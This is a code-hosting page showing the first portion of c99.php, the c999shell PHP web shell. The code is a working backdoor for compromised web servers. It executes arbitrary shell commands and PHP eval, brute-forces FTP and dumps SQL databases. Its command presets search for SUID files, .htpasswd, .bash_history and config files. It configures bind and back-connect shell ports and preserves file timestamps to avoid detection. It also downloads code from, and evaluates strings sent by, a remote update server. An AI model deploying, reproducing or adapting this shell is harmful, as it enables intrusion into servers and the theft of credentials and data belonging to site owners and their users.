PageRenderTime 359ms CodeModel.GetById 20ms RepoModel.GetById 1ms app.codeStats 0ms

/c99.php

https://gitlab.com/Endou_Mamoru/files0
PHP | 1082 lines | 1008 code | 34 blank | 40 comment | 128 complexity | c1fed34e277559111470f622f7cc6132 MD5 | raw file
  1. <?php
  2. //Starting calls
  3. if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
  4. error_reporting(5);
  5. @ignore_user_abort(TRUE);
  6. @set_magic_quotes_runtime(0);
  7. $win = strtolower(substr(PHP_OS,0,3)) == "win";
  8. define("starttime",getmicrotime());
  9. if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
  10. $_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
  11. foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
  12. $shver = "1.0 pre-release build #16"; //Current version
  13. //CONFIGURATION AND SETTINGS
  14. if (!empty($unset_surl)) {setcookie("c999sh_surl"); $surl = "";}
  15. elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c999sh_surl",$surl);}
  16. else {$surl = $_REQUEST["c999sh_surl"]; //Set this cookie for manual SURL
  17. }
  18. $surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
  19. if ($surl_autofill_include and !$_REQUEST["c999sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
  20. if (empty($surl))
  21. {
  22. $surl = "?".$includestr; //Self url
  23. }
  24. $surl = htmlspecialchars($surl);
  25. $timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
  26. //Authentication
  27. $login = ""; //login
  28. //DON'T FORGOT ABOUT PASSWORD!!!
  29. $pass = ""; //password
  30. $md5_pass = ""; //md5-cryped pass. if null, md5($pass)
  31. $host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
  32. $login_txt = "Restricted area"; //http-auth message.
  33. $accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c999shell\">c999shell v.".$shver."</a>: access denied";
  34. $gzipencode = TRUE; //Encode with gzip?
  35. $updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)
  36. $c999sh_updateurl = "http://ccteam.ru/update/c999shell/"; //Update server
  37. $c999sh_sourcesurl = "http://ccteam.ru/files/c999sh_sources/"; //Sources-server
  38. $filestealth = TRUE; //if TRUE, don't change modify- and access-time
  39. $donated_html = "<center><b>Owned by hacker</b></center>";
  40. /* If you publish free shell and you wish
  41. add link to your site or any other information,
  42. put here your html. */
  43. $donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
  44. $curdir = "./"; //start folder
  45. //$curdir = getenv("DOCUMENT_ROOT");
  46. $tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
  47. $tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
  48. $log_email = "user@host.tld"; //Default e-mail for sending logs
  49. $sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
  50. $sort_save = TRUE; //If TRUE then save sorting-position using cookies.
  51. // Registered file-types.
  52. // array(
  53. // "{action1}"=>array("ext1","ext2","ext3",...),
  54. // "{action2}"=>array("ext4","ext5","ext6",...),
  55. // ...
  56. // )
  57. $ftypes = array(
  58. "html"=>array("html","htm","shtml"),
  59. "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
  60. "exe"=>array("sh","install","bat","cmd"),
  61. "ini"=>array("ini","inf"),
  62. "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
  63. "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
  64. "sdb"=>array("sdb"),
  65. "phpsess"=>array("sess"),
  66. "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
  67. );
  68. // Registered executable file-types.
  69. // array(
  70. // string "command{i}"=>array("ext1","ext2","ext3",...),
  71. // ...
  72. // )
  73. // {command}: %f% = filename
  74. $exeftypes = array(
  75. getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
  76. "perl %f%" => array("pl","cgi")
  77. );
  78. /* Highlighted files.
  79. array(
  80. i=>array({regexp},{type},{opentag},{closetag},{break})
  81. ...
  82. )
  83. string {regexp} - regular exp.
  84. int {type}:
  85. 0 - files and folders (as default),
  86. 1 - files only, 2 - folders only
  87. string {opentag} - open html-tag, e.g. "<b>" (default)
  88. string {closetag} - close html-tag, e.g. "</b>" (default)
  89. bool {break} - if TRUE and found match then break
  90. */
  91. $regxp_highlight = array(
  92. array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
  93. array("config.php",1) // example
  94. );
  95. $safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
  96. // array (i=>{letter} ...); string {letter} - letter of a drive
  97. //$safemode_diskettes = range("a","z");
  98. $hexdump_lines = 8;// lines in hex preview file
  99. $hexdump_rows = 24;// 16, 24 or 32 bytes in one line
  100. $nixpwdperpage = 100; // Get first N lines from /etc/passwd
  101. $bindport_pass = "c999"; // default password for binding
  102. $bindport_port = "31373"; // default port for binding
  103. $bc_port = "31373"; // default port for back-connect
  104. $datapipe_localport = "8081"; // default port for datapipe
  105. // Command-aliases
  106. if (!$win)
  107. {
  108. $cmdaliases = array(
  109. array("-----------------------------------------------------------", "ls -la"),
  110. array("find all suid files", "find / -type f -perm -04000 -ls"),
  111. array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
  112. array("find all sgid files", "find / -type f -perm -02000 -ls"),
  113. array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
  114. array("find config.inc.php files", "find / -type f -name config.inc.php"),
  115. array("find config* files", "find / -type f -name \"config*\""),
  116. array("find config* files in current dir", "find . -type f -name \"config*\""),
  117. array("find all writable folders and files", "find / -perm -2 -ls"),
  118. array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
  119. array("find all service.pwd files", "find / -type f -name service.pwd"),
  120. array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
  121. array("find all .htpasswd files", "find / -type f -name .htpasswd"),
  122. array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
  123. array("find all .bash_history files", "find / -type f -name .bash_history"),
  124. array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
  125. array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
  126. array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
  127. array("list file attributes on a Linux second extended file system", "lsattr -va"),
  128. array("show opened ports", "netstat -an | grep -i listen")
  129. );
  130. }
  131. else
  132. {
  133. $cmdaliases = array(
  134. array("-----------------------------------------------------------", "dir"),
  135. array("show opened ports", "netstat -an")
  136. );
  137. }
  138. $sess_cookie = "c999shvars"; // Cookie-variable name
  139. $usefsbuff = TRUE; //Buffer-function
  140. $copy_unset = FALSE; //Remove copied files from buffer after pasting
  141. //Quick launch
  142. $quicklaunch = array(
  143. array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl),
  144. array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),
  145. array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),
  146. array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
  147. array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""),
  148. array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),
  149. array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),
  150. array("<b>Encoder</b>",$surl."act=encoder&d=%d"),
  151. array("<b>Tools</b>",$surl."act=tools&d=%d"),
  152. array("<b>Proc.</b>",$surl."act=processes&d=%d"),
  153. array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),
  154. array("<b>Sec.</b>",$surl."act=security&d=%d"),
  155. array("<b>SQL</b>",$surl."act=sql&d=%d"),
  156. array("<b>PHP-code</b>",$surl."act=eval&d=%d"),
  157. array("<b>Update</b>",$surl."act=update&d=%d"),
  158. array("<b>Feedback</b>",$surl."act=feedback&d=%d"),
  159. array("<b>Self remove</b>",$surl."act=selfremove"),
  160. array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()")
  161. );
  162. //Highlight-code colors
  163. $highlight_background = "#c0c0c0";
  164. $highlight_bg = "#FFFFFF";
  165. $highlight_comment = "#6A6A6A";
  166. $highlight_default = "#0000BB";
  167. $highlight_html = "#1300FF";
  168. $highlight_keyword = "#007700";
  169. $highlight_string = "#000000";
  170. @$f = $_REQUEST["f"];
  171. @extract($_REQUEST["c999shcook"]);
  172. //END CONFIGURATION
  173. // \/Next code isn't for editing\/
  174. @set_time_limit(0);
  175. $tmp = array();
  176. foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
  177. $s = "!^(".implode("|",$tmp).")$!i";
  178. if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc999shell\">c999shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
  179. if (!empty($login))
  180. {
  181. if (empty($md5_pass)) {$md5_pass = md5($pass);}
  182. if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
  183. {
  184. if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
  185. header("WWW-Authenticate: Basic realm=\"c999shell ".$shver.": ".$login_txt."\"");
  186. header("HTTP/1.0 401 Unauthorized");
  187. exit($accessdeniedmess);
  188. }
  189. }
  190. if ($act != "img")
  191. {
  192. $lastdir = realpath(".");
  193. chdir($curdir);
  194. if ($selfwrite or $updatenow) {@ob_clean(); c999sh_getupdate($selfwrite,1); exit;}
  195. $sess_data = unserialize($_COOKIE["$sess_cookie"]);
  196. if (!is_array($sess_data)) {$sess_data = array();}
  197. if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
  198. if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
  199. $disablefunc = @ini_get("disable_functions");
  200. if (!empty($disablefunc))
  201. {
  202. $disablefunc = str_replace(" ","",$disablefunc);
  203. $disablefunc = explode(",",$disablefunc);
  204. }
  205. if (!function_exists("c999_buff_prepare"))
  206. {
  207. function c999_buff_prepare()
  208. {
  209. global $sess_data;
  210. global $act;
  211. foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
  212. foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
  213. $sess_data["copy"] = array_unique($sess_data["copy"]);
  214. $sess_data["cut"] = array_unique($sess_data["cut"]);
  215. sort($sess_data["copy"]);
  216. sort($sess_data["cut"]);
  217. if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
  218. else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
  219. }
  220. }
  221. c999_buff_prepare();
  222. if (!function_exists("c999_sess_put"))
  223. {
  224. function c999_sess_put($data)
  225. {
  226. global $sess_cookie;
  227. global $sess_data;
  228. c999_buff_prepare();
  229. $sess_data = $data;
  230. $data = serialize($data);
  231. setcookie($sess_cookie,$data);
  232. }
  233. }
  234. foreach (array("sort","sql_sort") as $v)
  235. {
  236. if (!empty($_GET[$v])) {$$v = $_GET[$v];}
  237. if (!empty($_POST[$v])) {$$v = $_POST[$v];}
  238. }
  239. if ($sort_save)
  240. {
  241. if (!empty($sort)) {setcookie("sort",$sort);}
  242. if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
  243. }
  244. if (!function_exists("str2mini"))
  245. {
  246. function str2mini($content,$len)
  247. {
  248. if (strlen($content) > $len)
  249. {
  250. $len = ceil($len/2) - 2;
  251. return substr($content, 0,$len)."...".substr($content,-$len);
  252. }
  253. else {return $content;}
  254. }
  255. }
  256. if (!function_exists("view_size"))
  257. {
  258. function view_size($size)
  259. {
  260. if (!is_numeric($size)) {return FALSE;}
  261. else
  262. {
  263. if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
  264. elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
  265. elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
  266. else {$size = $size . " B";}
  267. return $size;
  268. }
  269. }
  270. }
  271. if (!function_exists("fs_copy_dir"))
  272. {
  273. function fs_copy_dir($d,$t)
  274. {
  275. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  276. if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  277. $h = opendir($d);
  278. while (($o = readdir($h)) !== FALSE)
  279. {
  280. if (($o != ".") and ($o != ".."))
  281. {
  282. if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  283. else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  284. if (!$ret) {return $ret;}
  285. }
  286. }
  287. closedir($h);
  288. return TRUE;
  289. }
  290. }
  291. if (!function_exists("fs_copy_obj"))
  292. {
  293. function fs_copy_obj($d,$t)
  294. {
  295. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  296. $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
  297. if (!is_dir(dirname($t))) {mkdir(dirname($t));}
  298. if (is_dir($d))
  299. {
  300. if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  301. if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  302. return fs_copy_dir($d,$t);
  303. }
  304. elseif (is_file($d)) {return copy($d,$t);}
  305. else {return FALSE;}
  306. }
  307. }
  308. if (!function_exists("fs_move_dir"))
  309. {
  310. function fs_move_dir($d,$t)
  311. {
  312. $h = opendir($d);
  313. if (!is_dir($t)) {mkdir($t);}
  314. while (($o = readdir($h)) !== FALSE)
  315. {
  316. if (($o != ".") and ($o != ".."))
  317. {
  318. $ret = TRUE;
  319. if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  320. else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
  321. if (!$ret) {return $ret;}
  322. }
  323. }
  324. closedir($h);
  325. return TRUE;
  326. }
  327. }
  328. if (!function_exists("fs_move_obj"))
  329. {
  330. function fs_move_obj($d,$t)
  331. {
  332. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  333. $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
  334. if (is_dir($d))
  335. {
  336. if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  337. if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  338. return fs_move_dir($d,$t);
  339. }
  340. elseif (is_file($d))
  341. {
  342. if(copy($d,$t)) {return unlink($d);}
  343. else {unlink($t); return FALSE;}
  344. }
  345. else {return FALSE;}
  346. }
  347. }
  348. if (!function_exists("fs_rmdir"))
  349. {
  350. function fs_rmdir($d)
  351. {
  352. $h = opendir($d);
  353. while (($o = readdir($h)) !== FALSE)
  354. {
  355. if (($o != ".") and ($o != ".."))
  356. {
  357. if (!is_dir($d.$o)) {unlink($d.$o);}
  358. else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
  359. }
  360. }
  361. closedir($h);
  362. rmdir($d);
  363. return !is_dir($d);
  364. }
  365. }
  366. if (!function_exists("fs_rmobj"))
  367. {
  368. function fs_rmobj($o)
  369. {
  370. $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
  371. if (is_dir($o))
  372. {
  373. if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
  374. return fs_rmdir($o);
  375. }
  376. elseif (is_file($o)) {return unlink($o);}
  377. else {return FALSE;}
  378. }
  379. }
  380. if (!function_exists("myshellexec"))
  381. {
  382. function myshellexec($cmd)
  383. {
  384. global $disablefunc;
  385. $result = "";
  386. if (!empty($cmd))
  387. {
  388. if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  389. elseif (($result = `$cmd`) !== FALSE) {}
  390. elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  391. elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  392. elseif (is_resource($fp = popen($cmd,"r")))
  393. {
  394. $result = "";
  395. while(!feof($fp)) {$result .= fread($fp,1024);}
  396. pclose($fp);
  397. }
  398. }
  399. return $result;
  400. }
  401. }
  402. if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
  403. if (!function_exists("view_perms"))
  404. {
  405. function view_perms($mode)
  406. {
  407. if (($mode & 0xC000) === 0xC000) {$type = "s";}
  408. elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
  409. elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
  410. elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
  411. elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
  412. elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
  413. elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
  414. else {$type = "?";}
  415. $owner["read"] = ($mode & 00400)?"r":"-";
  416. $owner["write"] = ($mode & 00200)?"w":"-";
  417. $owner["execute"] = ($mode & 00100)?"x":"-";
  418. $group["read"] = ($mode & 00040)?"r":"-";
  419. $group["write"] = ($mode & 00020)?"w":"-";
  420. $group["execute"] = ($mode & 00010)?"x":"-";
  421. $world["read"] = ($mode & 00004)?"r":"-";
  422. $world["write"] = ($mode & 00002)? "w":"-";
  423. $world["execute"] = ($mode & 00001)?"x":"-";
  424. if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
  425. if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
  426. if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
  427. return $type.join("",$owner).join("",$group).join("",$world);
  428. }
  429. }
  430. if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
  431. if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
  432. if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
  433. if (!function_exists("parse_perms"))
  434. {
  435. function parse_perms($mode)
  436. {
  437. if (($mode & 0xC000) === 0xC000) {$t = "s";}
  438. elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
  439. elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
  440. elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
  441. elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
  442. elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
  443. elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
  444. else {$t = "?";}
  445. $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
  446. $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
  447. $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
  448. return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
  449. }
  450. }
  451. if (!function_exists("parsesort"))
  452. {
  453. function parsesort($sort)
  454. {
  455. $one = intval($sort);
  456. $second = substr($sort,-1);
  457. if ($second != "d") {$second = "a";}
  458. return array($one,$second);
  459. }
  460. }
  461. if (!function_exists("view_perms_color"))
  462. {
  463. function view_perms_color($o)
  464. {
  465. if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
  466. elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
  467. else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
  468. }
  469. }
  470. if (!function_exists("c999getsource"))
  471. {
  472. function c999getsource($fn)
  473. {
  474. global $c999sh_sourcesurl;
  475. $array = array(
  476. "c999sh_bindport.pl" => "c999sh_bindport_pl.txt",
  477. "c999sh_bindport.c" => "c999sh_bindport_c.txt",
  478. "c999sh_backconn.pl" => "c999sh_backconn_pl.txt",
  479. "c999sh_backconn.c" => "c999sh_backconn_c.txt",
  480. "c999sh_datapipe.pl" => "c999sh_datapipe_pl.txt",
  481. "c999sh_datapipe.c" => "c999sh_datapipe_c.txt",
  482. );
  483. $name = $array[$fn];
  484. if ($name) {return file_get_contents($c999sh_sourcesurl.$name);}
  485. else {return FALSE;}
  486. }
  487. }
  488. if (!function_exists("c999sh_getupdate"))
  489. {
  490. function c999sh_getupdate($update = TRUE)
  491. {
  492. $url = $GLOBALS["c999sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&";
  493. $data = @file_get_contents($url);
  494. if (!$data) {return "Can't connect to update-server!";}
  495. else
  496. {
  497. $data = ltrim($data);
  498. $string = substr($data,3,ord($data{2}));
  499. if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
  500. if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
  501. if ($data{0} == "\x99" and $data{1} == "\x03")
  502. {
  503. $string = explode("\x01",$string);
  504. if ($update)
  505. {
  506. $confvars = array();
  507. $sourceurl = $string[0];
  508. $source = file_get_contents($sourceurl);
  509. if (!$source) {return "Can't fetch update!";}
  510. else
  511. {
  512. $fp = fopen(__FILE__,"w");
  513. if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c999shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
  514. else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";}
  515. }
  516. }
  517. else {return "New version are available: ".$string[1];}
  518. }
  519. elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;}
  520. else {return "Error in protocol: segmentation failed! (".$data.") ";}
  521. }
  522. }
  523. }
  524. if (!function_exists("mysql_dump"))
  525. {
  526. function mysql_dump($set)
  527. {
  528. global $shver;
  529. $sock = $set["sock"];
  530. $db = $set["db"];
  531. $print = $set["print"];
  532. $nl2br = $set["nl2br"];
  533. $file = $set["file"];
  534. $add_drop = $set["add_drop"];
  535. $tabs = $set["tabs"];
  536. $onlytabs = $set["onlytabs"];
  537. $ret = array();
  538. $ret["err"] = array();
  539. if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
  540. if (empty($db)) {$db = "db";}
  541. if (empty($print)) {$print = 0;}
  542. if (empty($nl2br)) {$nl2br = 0;}
  543. if (empty($add_drop)) {$add_drop = TRUE;}
  544. if (empty($file))
  545. {
  546. $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
  547. }
  548. if (!is_array($tabs)) {$tabs = array();}
  549. if (empty($add_drop)) {$add_drop = TRUE;}
  550. if (sizeof($tabs) == 0)
  551. {
  552. // retrive tables-list
  553. $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
  554. if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
  555. }
  556. $out = "# Dumped by c999Shell.SQL v. ".$shver."
  557. # Home page: http://ccteam.ru
  558. #
  559. # Host settings:
  560. # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
  561. # Date: ".date("d.m.Y H:i:s")."
  562. # DB: \"".$db."\"
  563. #---------------------------------------------------------
  564. ";
  565. $c = count($onlytabs);
  566. foreach($tabs as $tab)
  567. {
  568. if ((in_array($tab,$onlytabs)) or (!$c))
  569. {
  570. if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
  571. // recieve query for create table structure
  572. $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
  573. if (!$res) {$ret["err"][] = mysql_smarterror();}
  574. else
  575. {
  576. $row = mysql_fetch_row($res);
  577. $out .= $row["1"].";\n\n";
  578. // recieve table variables
  579. $res = mysql_query("SELECT * FROM `$tab`", $sock);
  580. if (mysql_num_rows($res) > 0)
  581. {
  582. while ($row = mysql_fetch_assoc($res))
  583. {
  584. $keys = implode("`, `", array_keys($row));
  585. $values = array_values($row);
  586. foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
  587. $values = implode("', '", $values);
  588. $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
  589. $out .= $sql;
  590. }
  591. }
  592. }
  593. }
  594. }
  595. $out .= "#---------------------------------------------------------------------------------\n\n";
  596. if ($file)
  597. {
  598. $fp = fopen($file, "w");
  599. if (!$fp) {$ret["err"][] = 2;}
  600. else
  601. {
  602. fwrite ($fp, $out);
  603. fclose ($fp);
  604. }
  605. }
  606. if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
  607. return $out;
  608. }
  609. }
  610. if (!function_exists("mysql_buildwhere"))
  611. {
  612. function mysql_buildwhere($array,$sep=" and",$functs=array())
  613. {
  614. if (!is_array($array)) {$array = array();}
  615. $result = "";
  616. foreach($array as $k=>$v)
  617. {
  618. $value = "";
  619. if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
  620. $value .= "'".addslashes($v)."'";
  621. if (!empty($functs[$k])) {$value .= ")";}
  622. $result .= "`".$k."` = ".$value.$sep;
  623. }
  624. $result = substr($result,0,strlen($result)-strlen($sep));
  625. return $result;
  626. }
  627. }
  628. if (!function_exists("mysql_fetch_all"))
  629. {
  630. function mysql_fetch_all($query,$sock)
  631. {
  632. if ($sock) {$result = mysql_query($query,$sock);}
  633. else {$result = mysql_query($query);}
  634. $array = array();
  635. while ($row = mysql_fetch_array($result)) {$array[] = $row;}
  636. mysql_free_result($result);
  637. return $array;
  638. }
  639. }
  640. if (!function_exists("mysql_smarterror"))
  641. {
  642. function mysql_smarterror($type,$sock)
  643. {
  644. if ($sock) {$error = mysql_error($sock);}
  645. else {$error = mysql_error();}
  646. $error = htmlspecialchars($error);
  647. return $error;
  648. }
  649. }
  650. if (!function_exists("mysql_query_form"))
  651. {
  652. function mysql_query_form()
  653. {
  654. global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
  655. if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
  656. if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
  657. if ((!$submit) or ($sql_act))
  658. {
  659. echo "<table border=0><tr><td><form name=\"c999sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
  660. if ($tbl_struct)
  661. {
  662. echo "<td valign=\"top\"><b>Fields:</b><br>";
  663. foreach ($tbl_struct as $field) {$name = $field["Field"]; echo " <a href=\"#\" onclick=\"document.c999sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
  664. echo "</td></tr></table>";
  665. }
  666. }
